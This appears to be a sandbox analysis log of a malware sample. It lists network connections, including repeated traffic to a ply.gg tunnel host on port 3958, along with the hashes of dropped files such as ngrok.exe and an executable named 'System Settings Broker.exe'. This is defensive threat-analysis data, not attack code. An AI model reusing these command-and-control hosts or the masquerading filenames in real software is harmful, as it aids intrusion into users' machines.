US 8.8.8.8:53 sync-tm.everesttech.net udp
DE 37.252.171.52:443 secure.adnxs.com tcp
GB 164.132.25.181:443 ssbsync.smartadserver.com tcp
US 151.101.2.49:443 sync-tm.everesttech.net tcp
GB 96.16.109.9:443 ads.pubmatic.com tcp
US 8.8.8.8:53 match.sharethrough.com udp
DE 3.68.18.56:443 match.sharethrough.com tcp
DE 3.68.18.56:443 match.sharethrough.com tcp
US 8.8.8.8:53 image6.pubmatic.com udp
GB 185.64.190.78:443 image6.pubmatic.com tcp
US 8.8.8.8:53 sync.mathtag.com udp
US 8.8.8.8:53 dis.criteo.com udp
NL 185.29.134.244:443 sync.mathtag.com tcp
FR 178.250.1.9:443 dis.criteo.com tcp
US 8.8.8.8:53 aax-eu.amazon-adsystem.com udp
IE 52.95.118.179:443 aax-eu.amazon-adsystem.com tcp
IE 52.19.8.73:443 sync.crwdcntrl.net tcp
US 8.8.8.8:53 cr.frontend.weborama.fr udp
US 8.8.8.8:53 a.audrte.com udp
US 8.8.8.8:53 um.simpli.fi udp
US 8.8.8.8:53 c1.adform.net udp
US 52.223.40.198:443 match.adsrvr.org tcp
IE 52.48.177.163:443 a.audrte.com tcp
US 8.8.8.8:53 pr-bh.ybp.yahoo.com udp
DK 37.157.6.243:443 c1.adform.net tcp
US 8.8.8.8:53 ups.analytics.yahoo.com udp
US 34.111.129.221:443 cr.frontend.weborama.fr tcp
NL 34.91.62.186:443 um.simpli.fi tcp
NL 185.29.134.244:443 sync.mathtag.com tcp
IE 54.228.140.66:443 pr-bh.ybp.yahoo.com tcp
DE 3.75.62.37:443 ups.analytics.yahoo.com tcp
US 8.8.8.8:53 image2.pubmatic.com udp
NL 198.47.127.205:443 image2.pubmatic.com tcp
NL 198.47.127.205:443 image2.pubmatic.com tcp
US 8.8.8.8:53 dmp.adform.net udp
DK 37.157.2.229:443 dmp.adform.net tcp
US 8.8.8.8:53 simage4.pubmatic.com udp
NL 198.47.127.20:443 simage4.pubmatic.com tcp
GB 185.64.190.78:443 image6.pubmatic.com tcp
DK 37.157.6.243:443 c1.adform.net tcp
NL 185.89.210.244:443 ib.adnxs.com tcp
US 8.8.8.8:53 cms.quantserve.com udp
US 151.101.2.49:443 sync-tm.everesttech.net tcp
US 8.8.8.8:53 dsp.adfarm1.adition.com udp
US 8.8.8.8:53 x.bidswitch.net udp
US 8.8.8.8:53 match.prod.bidr.io udp
US 8.8.8.8:53 t.adx.opera.com udp
US 8.8.8.8:53 sync.srv.stackadapt.com udp
US 8.8.8.8:53 mwzeom.zeotap.com udp
US 8.8.8.8:53 uipglob.semasio.net udp
US 8.8.8.8:53 pixel.onaudience.com udp
US 8.8.8.8:53 pixel-sync.sitescout.com udp
US 8.8.8.8:53 pubmatic-match.dotomi.com udp
DE 85.114.159.93:443 dsp.adfarm1.adition.com tcp
US 54.224.142.7:443 sync.srv.stackadapt.com tcp
NL 82.145.213.8:443 t.adx.opera.com tcp
US 172.67.13.182:443 mwzeom.zeotap.com tcp
DE 91.228.74.166:443 cms.quantserve.com tcp
IE 52.30.179.44:443 match.prod.bidr.io tcp
DE 35.157.253.10:443 x.bidswitch.net tcp
DK 77.243.51.122:443 uipglob.semasio.net tcp
FR 141.94.171.216:443 pixel.onaudience.com tcp
DE 91.228.74.166:443 cms.quantserve.com tcp
DE 85.114.159.93:443 dsp.adfarm1.adition.com tcp
US 54.224.142.7:443 sync.srv.stackadapt.com tcp
DE 35.157.253.10:443 x.bidswitch.net tcp
IE 52.30.179.44:443 match.prod.bidr.io tcp
NL 98.98.134.241:443 pixel-sync.sitescout.com tcp
NL 82.145.213.8:443 t.adx.opera.com tcp
NL 63.215.202.172:443 pubmatic-match.dotomi.com tcp
US 172.67.13.182:443 mwzeom.zeotap.com tcp
DK 77.243.51.122:443 uipglob.semasio.net tcp
FR 141.94.171.216:443 pixel.onaudience.com tcp
NL 63.215.202.172:443 pubmatic-match.dotomi.com tcp
NL 98.98.134.241:443 pixel-sync.sitescout.com tcp
US 8.8.8.8:53 simage2.pubmatic.com udp
GB 185.64.191.210:443 simage2.pubmatic.com tcp
GB 185.64.191.210:443 simage2.pubmatic.com tcp
NL 198.47.127.20:443 simage4.pubmatic.com tcp
US 8.8.8.8:53 www.filemail.com udp
NL 178.21.23.181:443 www.filemail.com tcp
US 216.105.38.9:443 analytics.slashdotmedia.com tcp
FR 216.58.215.35:443 beacons.gcp.gvt2.com udp
FR 216.58.215.35:443 beacons.gcp.gvt2.com tcp
US 104.18.33.97:443 c.sf-syn.com udp
DE 87.230.98.76:443 d.delivery.consentmanager.net tcp
US 172.67.41.60:443 btloader.com tcp
NL 185.89.210.244:443 ib.adnxs.com tcp
DE 3.122.93.43:443 btlr.sharethrough.com tcp
NL 216.52.2.39:443 ap.lijit.com tcp
NL 213.19.162.91:443 fastlane.rubiconproject.com tcp
GB 185.64.190.77:443 hbopenbid.pubmatic.com tcp
US 216.105.38.9:443 analytics.slashdotmedia.com tcp
US 8.8.8.8:53 tags.bluekai.com udp
DE 3.127.178.105:443 ps.eyeota.net tcp
US 8.8.8.8:53 trc.taboola.com udp
US 172.67.69.19:443 ad-delivery.net tcp
US 151.101.1.44:443 trc.taboola.com tcp
US 2.19.169.14:443 tags.bluekai.com tcp
US 8.8.8.8:53 6cee2ff7eec00c7170bd03cf9ead5d7a.safeframe.googlesyndication.com udp
GB 142.250.179.225:443 6cee2ff7eec00c7170bd03cf9ead5d7a.safeframe.googlesyndication.com tcp
US 8.8.8.8:53 cdn.ampproject.org udp
GB 172.217.16.225:443 cdn.ampproject.org tcp
GB 172.217.16.225:443 cdn.ampproject.org tcp
GB 172.217.16.225:443 cdn.ampproject.org tcp
GB 172.217.16.225:443 cdn.ampproject.org tcp
GB 172.217.16.225:443 cdn.ampproject.org tcp
GB 172.217.16.225:443 cdn.ampproject.org tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 52.223.40.198:443 match.adsrvr.org tcp
GB 96.16.109.9:443 ads.pubmatic.com tcp
DE 37.252.171.52:443 secure.adnxs.com tcp
US 52.223.40.198:443 match.adsrvr.org tcp
US 151.101.2.49:443 sync-tm.everesttech.net tcp
US 8.8.8.8:53 pixel.rubiconproject.com udp
US 104.16.56.101:443 static.cloudflareinsights.com tcp
NL 213.19.162.90:443 pixel.rubiconproject.com tcp
DE 3.68.18.56:443 match.sharethrough.com tcp
DE 87.230.98.76:443 d.delivery.consentmanager.net tcp
CH 185.29.132.241:443 sync.mathtag.com tcp
US 172.67.41.60:443 btloader.com tcp
NL 216.52.2.39:443 ap.lijit.com tcp
DE 3.122.93.43:443 btlr.sharethrough.com tcp
GB 185.64.190.77:443 hbopenbid.pubmatic.com tcp
NL 185.89.210.244:443 ib.adnxs.com tcp
NL 213.19.162.91:443 fastlane.rubiconproject.com tcp
CH 185.29.132.241:443 sync.mathtag.com tcp
US 172.67.69.19:443 ad-delivery.net tcp
US 8.8.8.8:53 057171fac96702812a93e474168c5edf.safeframe.googlesyndication.com udp
GB 96.16.109.9:443 ads.pubmatic.com tcp
NL 213.19.162.90:443 pixel.rubiconproject.com tcp
GB 164.132.25.181:443 ssbsync.smartadserver.com tcp
US 52.223.40.198:443 match.adsrvr.org tcp
DE 37.252.171.52:443 secure.adnxs.com tcp
DE 3.68.18.56:443 match.sharethrough.com tcp
GB 185.64.190.78:443 image6.pubmatic.com tcp
US 8.8.8.8:53 cm.adgrx.com udp
US 8.8.8.8:53 p.rfihub.com udp
US 8.8.8.8:53 csync.loopme.me udp
US 8.8.8.8:53 d5p.de17a.com udp
US 8.8.8.8:53 ipac.ctnsnet.com udp
US 8.8.8.8:53 core.iprom.net udp
US 8.8.8.8:53 green.erne.co udp
US 8.8.8.8:53 ad.mrtnsvr.com udp
NL 72.251.241.204:443 cm.adgrx.com tcp
NL 35.214.128.77:443 csync.loopme.me tcp
NL 193.0.160.130:443 p.rfihub.com tcp
SE 213.155.156.185:443 d5p.de17a.com tcp
US 35.186.193.173:443 ipac.ctnsnet.com tcp
US 34.102.163.6:443 ad.mrtnsvr.com tcp
FR 141.95.171.140:443 green.erne.co tcp
SI 195.5.165.20:443 core.iprom.net tcp
US 8.8.8.8:53 ad.turn.com udp
US 8.8.8.8:53 match.adsby.bidtheatre.com udp
NL 64.227.64.62:443 match.adsby.bidtheatre.com tcp
NL 46.228.164.11:443 ad.turn.com tcp
NL 46.228.164.11:443 ad.turn.com tcp
NL 198.47.127.205:443 image2.pubmatic.com tcp
GB 185.64.191.210:443 simage2.pubmatic.com tcp
NL 198.47.127.20:443 simage4.pubmatic.com tcp
US 8.8.8.8:53 downloads.sourceforge.net udp
US 204.68.111.105:443 downloads.sourceforge.net tcp
US 204.68.111.105:443 downloads.sourceforge.net tcp
US 8.8.8.8:53 altushost-swe.dl.sourceforge.net udp
SE 79.142.76.130:443 altushost-swe.dl.sourceforge.net tcp
NL 178.21.23.181:443 www.filemail.com tcp
US 8.8.8.8:53 16.ip.gl.ply.gg udp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 104.16.56.101:443 static.cloudflareinsights.com tcp
DE 87.230.98.76:443 d.delivery.consentmanager.net tcp
US 172.67.41.60:443 btloader.com tcp
GB 185.64.190.77:443 hbopenbid.pubmatic.com tcp
NL 185.89.210.244:443 ib.adnxs.com tcp
DE 3.122.93.43:443 btlr.sharethrough.com tcp
NL 213.19.162.91:443 fastlane.rubiconproject.com tcp
NL 216.52.2.39:443 ap.lijit.com tcp
US 216.105.38.9:443 analytics.slashdotmedia.com tcp
US 8.8.8.8:53 loadus.exelator.com udp
DE 3.127.178.105:443 ps.eyeota.net tcp
DE 18.198.69.109:443 loadus.exelator.com tcp
US 172.67.69.19:443 ad-delivery.net tcp
US 52.223.40.198:443 match.adsrvr.org tcp
US 8.8.8.8:53 2cd3b9f51d6831d2eae1f66d2d03a282.safeframe.googlesyndication.com udp
GB 142.250.179.225:443 2cd3b9f51d6831d2eae1f66d2d03a282.safeframe.googlesyndication.com tcp
GB 142.250.179.225:443 2cd3b9f51d6831d2eae1f66d2d03a282.safeframe.googlesyndication.com udp
GB 96.16.109.9:443 ads.pubmatic.com tcp
GB 164.132.25.181:443 ssbsync.smartadserver.com tcp
DE 37.252.171.52:443 secure.adnxs.com tcp
US 151.101.2.49:443 sync-tm.everesttech.net tcp
US 52.223.40.198:443 match.adsrvr.org tcp
US 8.8.8.8:53 image8.pubmatic.com udp
GB 185.64.190.79:443 image8.pubmatic.com tcp
DE 3.68.18.56:443 match.sharethrough.com tcp
GB 185.64.190.78:443 image6.pubmatic.com tcp
US 8.8.8.8:53 image4.pubmatic.com udp
NL 198.47.127.20:443 image4.pubmatic.com tcp
US 8.8.8.8:53 cm-supply-web.gammaplatform.com udp
NL 34.91.62.186:443 um.simpli.fi tcp
SG 35.186.154.107:443 cm-supply-web.gammaplatform.com tcp
US 8.8.8.8:53 a.tribalfusion.com udp
US 8.8.8.8:53 matching.truffle.bid udp
US 8.8.8.8:53 sync.1rx.io udp
NL 46.228.174.117:443 sync.1rx.io tcp
US 104.18.25.173:443 a.tribalfusion.com tcp
DE 162.55.120.196:443 matching.truffle.bid tcp
SG 35.186.154.107:443 cm-supply-web.gammaplatform.com tcp
US 8.8.8.8:53 s.tribalfusion.com udp
NL 46.228.164.11:443 ad.turn.com tcp
US 104.16.56.101:443 static.cloudflareinsights.com tcp
DE 87.230.98.76:443 d.delivery.consentmanager.net tcp
US 104.18.33.97:443 c.sf-syn.com udp
US 172.67.41.60:443 btloader.com tcp
NL 185.89.210.244:443 ib.adnxs.com tcp
NL 216.52.2.39:443 ap.lijit.com tcp
GB 185.64.190.77:443 hbopenbid.pubmatic.com tcp
US 8.8.8.8:53 btlr.sharethrough.com udp
NL 213.19.162.91:443 fastlane.rubiconproject.com tcp
US 216.105.38.9:443 analytics.slashdotmedia.com tcp
DE 3.72.143.230:443 btlr.sharethrough.com tcp
US 8.8.8.8:53 ps.eyeota.net udp
DE 3.121.27.153:443 ps.eyeota.net tcp
US 172.67.69.19:443 ad-delivery.net tcp
US 8.8.8.8:53 9010bfe3246b113e4bf7b8c6ae190e90.safeframe.googlesyndication.com udp
GB 142.250.179.225:443 9010bfe3246b113e4bf7b8c6ae190e90.safeframe.googlesyndication.com tcp
GB 142.250.187.198:443 s0.2mdn.net udp
NL 216.52.2.39:443 ap.lijit.com tcp
US 8.8.8.8:53 ssbsync.smartadserver.com udp
US 52.223.40.198:443 match.adsrvr.org tcp
GB 142.250.200.34:443 googleads4.g.doubleclick.net udp
GB 185.64.190.78:443 image6.pubmatic.com tcp
GB 142.250.187.198:443 s0.2mdn.net tcp
GB 142.250.200.34:443 googleads4.g.doubleclick.net tcp
NL 81.17.55.109:443 ssbsync.smartadserver.com tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 52.223.40.198:443 match.adsrvr.org tcp
NL 213.19.162.90:443 pixel.rubiconproject.com tcp
US 8.8.8.8:53 ads.pubmatic.com udp
US 8.8.8.8:53 sync-tm.everesttech.net udp
NL 198.47.127.20:443 image4.pubmatic.com tcp
US 151.101.2.49:443 sync-tm.everesttech.net tcp
GB 96.16.109.9:443 ads.pubmatic.com tcp
US 8.8.8.8:53 match.sharethrough.com udp
DE 3.64.26.145:443 match.sharethrough.com tcp
NL 178.21.23.181:443 www.filemail.com tcp
US 8.8.8.8:53 beacons2.gvt2.com udp
US 74.125.192.94:443 beacons2.gvt2.com tcp
US 74.125.192.94:443 beacons2.gvt2.com udp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
DE 3.72.143.230:443 btlr.sharethrough.com tcp
NL 185.89.210.244:443 ib.adnxs.com tcp
GB 185.64.190.77:443 hbopenbid.pubmatic.com tcp
NL 216.52.2.39:443 ap.lijit.com tcp
NL 213.19.162.91:443 fastlane.rubiconproject.com tcp
NL 216.52.2.39:443 ap.lijit.com tcp
US 8.8.8.8:53 e2c15.gcp.gvt2.com udp
GB 142.250.187.194:443 securepubads.g.doubleclick.net udp
GB 34.105.225.79:443 e2c15.gcp.gvt2.com tcp
GB 142.250.179.225:443 9010bfe3246b113e4bf7b8c6ae190e90.safeframe.googlesyndication.com udp
DE 172.217.16.131:443 beacons.gvt2.com udp
GB 142.250.180.1:443 tpc.googlesyndication.com udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.200.4:443 www.google.com udp
DE 172.217.16.131:443 beacons.gvt2.com tcp
GB 142.250.187.194:443 securepubads.g.doubleclick.net udp
US 8.8.8.8:53 www.filemail.com udp
NL 178.21.23.181:443 www.filemail.com tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 8.8.8.8:53 btlr.sharethrough.com udp
US 8.8.8.8:53 ap.lijit.com udp
GB 185.64.190.77:443 hbopenbid.pubmatic.com tcp
NL 185.89.210.244:443 ib.adnxs.com tcp
NL 213.19.162.91:443 fastlane.rubiconproject.com tcp
NL 216.52.2.30:443 ap.lijit.com tcp
DE 3.65.163.105:443 btlr.sharethrough.com tcp
FR 216.58.215.35:443 beacons.gcp.gvt2.com udp
FR 216.58.215.35:443 beacons.gcp.gvt2.com tcp
GB 142.250.187.194:443 securepubads.g.doubleclick.net udp
GB 142.250.187.194:443 securepubads.g.doubleclick.net tcp
NL 178.21.23.181:443 www.filemail.com tcp
GB 142.250.179.225:443 9010bfe3246b113e4bf7b8c6ae190e90.safeframe.googlesyndication.com udp
GB 142.250.200.4:443 www.google.com udp
GB 142.250.180.1:443 tpc.googlesyndication.com udp
GB 142.250.200.4:443 www.google.com tcp
GB 142.250.180.1:443 tpc.googlesyndication.com tcp
GB 142.250.187.194:443 securepubads.g.doubleclick.net udp
GB 142.250.187.194:443 securepubads.g.doubleclick.net tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 74.125.192.94:443 beacons2.gvt2.com udp
US 8.8.8.8:53 beacons3.gvt2.com udp
US 74.125.192.94:443 beacons2.gvt2.com tcp
GB 216.58.213.3:443 beacons3.gvt2.com udp
GB 216.58.213.3:443 beacons3.gvt2.com tcp
NL 178.21.23.181:443 www.filemail.com tcp
DE 3.65.163.105:443 btlr.sharethrough.com tcp
NL 185.89.210.244:443 ib.adnxs.com tcp
NL 213.19.162.91:443 fastlane.rubiconproject.com tcp
GB 185.64.190.77:443 hbopenbid.pubmatic.com tcp
NL 216.52.2.30:443 ap.lijit.com tcp
NL 216.52.2.30:443 ap.lijit.com tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
GB 142.250.187.194:443 securepubads.g.doubleclick.net udp
GB 142.250.187.194:443 securepubads.g.doubleclick.net tcp
GB 142.250.179.225:443 9010bfe3246b113e4bf7b8c6ae190e90.safeframe.googlesyndication.com udp
GB 142.250.180.1:443 tpc.googlesyndication.com udp
US 8.8.8.8:53 www.google.com udp
GB 142.250.180.1:443 tpc.googlesyndication.com tcp
GB 142.250.200.4:443 www.google.com udp
GB 142.250.187.194:443 securepubads.g.doubleclick.net udp
GB 142.250.200.4:443 www.google.com tcp
GB 142.250.187.194:443 securepubads.g.doubleclick.net tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 8.8.8.8:53 www.filemail.com udp
NL 178.21.23.181:443 www.filemail.com tcp
US 8.8.8.8:53 beacons.gcp.gvt2.com udp
FR 216.58.215.35:443 beacons.gcp.gvt2.com udp
FR 216.58.215.35:443 beacons.gcp.gvt2.com tcp
GB 185.64.190.77:443 hbopenbid.pubmatic.com tcp
NL 185.89.210.244:443 ib.adnxs.com tcp
NL 213.19.162.91:443 fastlane.rubiconproject.com tcp
US 8.8.8.8:53 btlr.sharethrough.com udp
US 8.8.8.8:53 ap.lijit.com udp
NL 216.52.2.16:443 ap.lijit.com tcp
NL 216.52.2.16:443 ap.lijit.com tcp
DE 3.74.135.144:443 btlr.sharethrough.com tcp
DE 3.74.135.144:443 btlr.sharethrough.com tcp
GB 142.250.187.194:443 securepubads.g.doubleclick.net udp
GB 142.250.187.194:443 securepubads.g.doubleclick.net tcp
GB 142.250.179.225:443 9010bfe3246b113e4bf7b8c6ae190e90.safeframe.googlesyndication.com udp
US 8.8.8.8:53 tpc.googlesyndication.com udp
GB 142.250.180.1:443 tpc.googlesyndication.com udp
GB 142.250.180.1:443 tpc.googlesyndication.com tcp
GB 142.250.187.194:443 securepubads.g.doubleclick.net udp
GB 142.250.187.194:443 securepubads.g.doubleclick.net tcp
US 8.8.8.8:53 beacons.gvt2.com udp
US 74.125.192.94:443 beacons2.gvt2.com udp
FR 172.217.18.195:443 beacons.gvt2.com udp
FR 172.217.18.195:443 beacons.gvt2.com tcp
US 74.125.192.94:443 beacons2.gvt2.com tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
NL 178.21.23.181:443 www.filemail.com tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
NL 213.19.162.91:443 fastlane.rubiconproject.com tcp
NL 185.89.210.244:443 ib.adnxs.com tcp
GB 185.64.190.77:443 hbopenbid.pubmatic.com tcp
NL 216.52.2.16:443 ap.lijit.com tcp
DE 3.74.135.144:443 btlr.sharethrough.com tcp
NL 216.52.2.16:443 ap.lijit.com tcp
GB 142.250.187.194:443 securepubads.g.doubleclick.net udp
GB 142.250.187.194:443 securepubads.g.doubleclick.net tcp
GB 142.250.179.225:443 9010bfe3246b113e4bf7b8c6ae190e90.safeframe.googlesyndication.com udp
GB 142.250.180.1:443 tpc.googlesyndication.com udp
GB 142.250.180.1:443 tpc.googlesyndication.com tcp
GB 142.250.187.194:443 securepubads.g.doubleclick.net udp
GB 142.250.187.194:443 securepubads.g.doubleclick.net tcp
NL 178.21.23.181:443 www.filemail.com tcp
US 8.8.8.8:53 btlr.sharethrough.com udp
NL 213.19.162.91:443 fastlane.rubiconproject.com tcp
US 8.8.8.8:53 ib.adnxs.com udp
GB 185.64.190.77:443 hbopenbid.pubmatic.com tcp
US 8.8.8.8:53 ap.lijit.com udp
NL 185.89.210.122:443 ib.adnxs.com tcp
NL 216.52.2.39:443 ap.lijit.com tcp
NL 216.52.2.39:443 ap.lijit.com tcp
DE 35.157.104.62:443 btlr.sharethrough.com tcp
NL 185.89.210.122:443 ib.adnxs.com tcp
GB 142.250.187.194:443 securepubads.g.doubleclick.net udp
GB 142.250.187.194:443 securepubads.g.doubleclick.net tcp
GB 142.250.179.225:443 9010bfe3246b113e4bf7b8c6ae190e90.safeframe.googlesyndication.com udp
GB 142.250.180.1:443 tpc.googlesyndication.com udp
GB 142.250.180.1:443 tpc.googlesyndication.com tcp
GB 142.250.187.194:443 securepubads.g.doubleclick.net udp
GB 142.250.187.194:443 securepubads.g.doubleclick.net tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
GB 185.64.190.77:443 hbopenbid.pubmatic.com tcp
NL 185.89.210.122:443 ib.adnxs.com tcp
NL 216.52.2.39:443 ap.lijit.com tcp
DE 35.157.104.62:443 btlr.sharethrough.com tcp
NL 216.52.2.39:443 ap.lijit.com tcp
NL 213.19.162.91:443 fastlane.rubiconproject.com tcp
FR 216.58.215.35:443 beacons.gcp.gvt2.com udp
FR 216.58.215.35:443 beacons.gcp.gvt2.com tcp
GB 142.250.187.194:443 securepubads.g.doubleclick.net udp
GB 142.250.179.225:443 9010bfe3246b113e4bf7b8c6ae190e90.safeframe.googlesyndication.com udp
GB 142.250.180.1:443 tpc.googlesyndication.com udp
GB 142.250.187.194:443 securepubads.g.doubleclick.net udp
GB 142.250.187.194:443 securepubads.g.doubleclick.net tcp
US 104.18.37.111:443 sourceforge.net udp
US 8.8.8.8:53 www.filemail.com udp
NL 178.21.23.181:443 www.filemail.com tcp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
NL 178.21.23.181:443 www.filemail.com tcp
US 8.8.8.8:53 16.ip.gl.ply.gg udp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
US 8.8.8.8:53 16.ip.gl.ply.gg udp
US 147.185.221.16:3958 16.ip.gl.ply.gg tcp
N/A 127.0.0.1:56666 tcp
N/A 127.0.0.1:56666 tcp
N/A 127.0.0.1:56666 tcp
N/A 127.0.0.1:56666 tcp
N/A 127.0.0.1:56666 tcp
N/A 127.0.0.1:56666 tcp
N/A 127.0.0.1:56666 tcp
N/A 127.0.0.1:56666 tcp
N/A 127.0.0.1:56666 tcp
N/A 127.0.0.1:56666 tcp
N/A 127.0.0.1:56666 tcp
N/A 127.0.0.1:56666 tcp
N/A 127.0.0.1:56666 tcp
N/A 127.0.0.1:56666 tcp
N/A 127.0.0.1:56666 tcp
N/A 127.0.0.1:56666 tcp
N/A 127.0.0.1:56666 tcp
N/A 127.0.0.1:56666 tcp
N/A 127.0.0.1:56666 tcp
N/A 127.0.0.1:56666 tcp
N/A 127.0.0.1:56666 tcp
N/A 127.0.0.1:56666 tcp
N/A 127.0.0.1:56666 tcp
N/A 127.0.0.1:56666 tcp
N/A 127.0.0.1:56666 tcp
N/A 127.0.0.1:56666 tcp
N/A 127.0.0.1:56666 tcp
N/A 127.0.0.1:56666 tcp
N/A 127.0.0.1:56666 tcp
N/A 127.0.0.1:56666 tcp
N/A 127.0.0.1:56666 tcp
N/A 127.0.0.1:56666 tcp
N/A 127.0.0.1:56666 tcp

Files

\Users\Admin\AppData\Local\Temp\IXP000.TMP\ngrok.exe

MD5 6a8ca000f892894aae1bb554a5e486c1
SHA1 64de77f7b16f0981743a607d967b30514379b190
SHA256 d38d87ec0ad2b6b7bcdf58b48106e9b5a9241ed91b6437719b7211ef762a0d51
SHA512 83d796563dec98a104c6d5be33938cebd0bcf12f58a692a9fb44f63fbe91307c2a4e3d0bf0baa410ff74c8d8131fbc64133202d438460a7ca20ecd6273f2107d

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ngrok.exe

MD5 64a3d58c8116b55cf5ae863fa1657add
SHA1 5acda524f9068aacae2b36e54ebb36061fb005e3
SHA256 20c81d04fc078cdc7400b15e1b4dfa45c760a0f7d243794b2cfcb0f561e885ae
SHA512 e67c3ba40cdcbf2f23f1913d5b0077239d782bd80a4dd111f09bcb9e149074b967705f5300b60e94e2b67ed0cc9aea1e787aedb1ed94ba358281403547f58549

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ngrok.exe

MD5 8105ff2ad4986df66c9e5500df87254d
SHA1 b6c99a339ed44f1cb5d15b59129d567f5cfc8ee1
SHA256 c173facf21076baa354c3b30ec7951652aa14a7c28deaad0c10a2a243e00a8da
SHA512 8c9131e0900655655bc31ac3fb4642f12b040d9cb5b847be2990c885cb30b0d8f639ff4da1a8c06e16417a9f0b0261a7cbb8f817966a62be6ebd2b67350f5037

\Users\Admin\AppData\Local\Temp\IXP000.TMP\ngrok.exe

MD5 eb049c6727a07960f223014c4ce4257b
SHA1 141d4ea5cf5286bb3250fc2d5a4413cb8fda0d97
SHA256 8e458c49a625a107642f7b95683238fe53087ffc41ad7da1e4d0b072a07da22d
SHA512 9562247e712b35cf1875d07179d6ebfe036e36c9a4d59a896814c359baf656b16b7baef528e1e3fb08e05d4b4b0e06eb349b0057f15291b29f5de537d6919a23

\Users\Admin\AppData\Local\Temp\IXP000.TMP\ngrok.exe

MD5 cdc97c3939971871d2af191eca96da63
SHA1 ebb776d746404e97c3a7a2b99d5d12c13793fbb5
SHA256 a042471d28389be9aa6a918c9c007e25a55708cf284cd9bff433d51d9e5486b9
SHA512 0a63aaa6d6c9e1a192d285e11a970ecfcbbaae93ff4eba57ad9a41ce71f8a8450239eed2d3779195835d46b9ced5b1c62ca27a062e18beb8c41776c03aca561c

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ngrok.exe

MD5 e963299a07ddaa0927a7b1a7f1bc27f3
SHA1 654e580c51c11e8fca04bf545aaf00a5403f1671
SHA256 e535c47a277c592b3bdfadf4ce12f81dd2f5b49d5287da5f6d9e8740fce7f770
SHA512 10381a5b6215963cdf3e1cb325b7a9a4aeeadac517cf78389dfdeeb7194fa72015f274fc74500e49cd735dce5448e845381dc737bc5b63d9ab44d8ad3f4b3f97

C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\DANGER~1.EXE

MD5 32a4a1eb04f1c7e75e95321992a193b4
SHA1 009a7ff13e0bf73ad3b9b4d31d7192be4f6f22e2
SHA256 602b5b3924e9e408dddf592a561bf2dd7fc561bd6db31120d6c2652091df733a
SHA512 a41a648d98a2e28cf7b4129c9b5136e5eda773addb7dad311d2141ad5075c3363fc25d1a81cefc36abef9a0d3dd3456b2bbdfc06cb8088f6d082559fc7575bdf

memory/2260-20-0x0000000000070000-0x0000000000102000-memory.dmp

memory/2260-21-0x0000000074BE0000-0x00000000752CE000-memory.dmp

memory/2260-22-0x0000000004E30000-0x0000000004E70000-memory.dmp

memory/2260-24-0x0000000004E30000-0x0000000004E70000-memory.dmp

memory/2260-23-0x0000000004E30000-0x0000000004E70000-memory.dmp

memory/2260-25-0x0000000005FF0000-0x00000000060F0000-memory.dmp

memory/2260-26-0x0000000005FF0000-0x00000000060F0000-memory.dmp

memory/2260-27-0x0000000005FF0000-0x00000000060F0000-memory.dmp

memory/2260-28-0x0000000005FF0000-0x00000000060F0000-memory.dmp

\??\pipe\crashpad_2712_RWBANMRWRESBYHFD

MD5 d41d8cd98f00b204e9800998ecf8427e
SHA1 da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256 e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512 cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Site Characteristics Database\000007.dbtmp

MD5 18e723571b00fb1694a3bad6c78e4054
SHA1 afcc0ef32d46fe59e0483f9a3c891d3034d12f32
SHA256 8af72f43857550b01eab1019335772b367a17a9884a7a759fdf4fe6f272b90aa
SHA512 43bb0af7d3984012d2d67ca6b71f0201e5b948e6fe26a899641c4c6f066c59906d468ddf7f1df5ea5fa33c2bc5ea8219c0f2c82e0a5c365ad7581b898a8859e2

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\data_1

MD5 f50f89a0a91564d0b8a211f8921aa7de
SHA1 112403a17dd69d5b9018b8cede023cb3b54eab7d
SHA256 b1e963d702392fb7224786e7d56d43973e9b9efd1b89c17814d7c558ffc0cdec
SHA512 bf8cda48cf1ec4e73f0dd1d4fa5562af1836120214edb74957430cd3e4a2783e801fa3f4ed2afb375257caeed4abe958265237d6e0aacf35a9ede7a2e8898d58

memory/2260-76-0x0000000004F70000-0x0000000004F8E000-memory.dmp

memory/2260-92-0x0000000074BE0000-0x00000000752CE000-memory.dmp

memory/2260-97-0x0000000004E30000-0x0000000004E70000-memory.dmp

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GCM Store\Encryption\000006.dbtmp

MD5 aefd77f47fb84fae5ea194496b44c67a
SHA1 dcfbb6a5b8d05662c4858664f81693bb7f803b82
SHA256 4166bf17b2da789b0d0cc5c74203041d98005f5d4ef88c27e8281e00148cd611
SHA512 b733d502138821948267a8b27401d7c0751e590e1298fda1428e663ccd02f55d0d2446ff4bc265bdcdc61f952d13c01524a5341bc86afc3c2cde1d8589b2e1c3

C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe

MD5 e7b2645346626df4e0c65c1e3cded68d
SHA1 7754e7b4ad748cf1956a32128ce5b2934e78e822
SHA256 9566a036e6128e1187968491ead5c36ea7020e20b6766adddafba6436a7d8892
SHA512 a4bcf84b069b50d1956fb876b42d2a6415819c36fdee329f3025a9174cca4aa2e2be838e6a34147317ba6925d8b21c66c6f70f48619b1de0b82c2aed90898d76

C:\Users\Admin\AppData\Local\Temp\System Settings Broker.exe

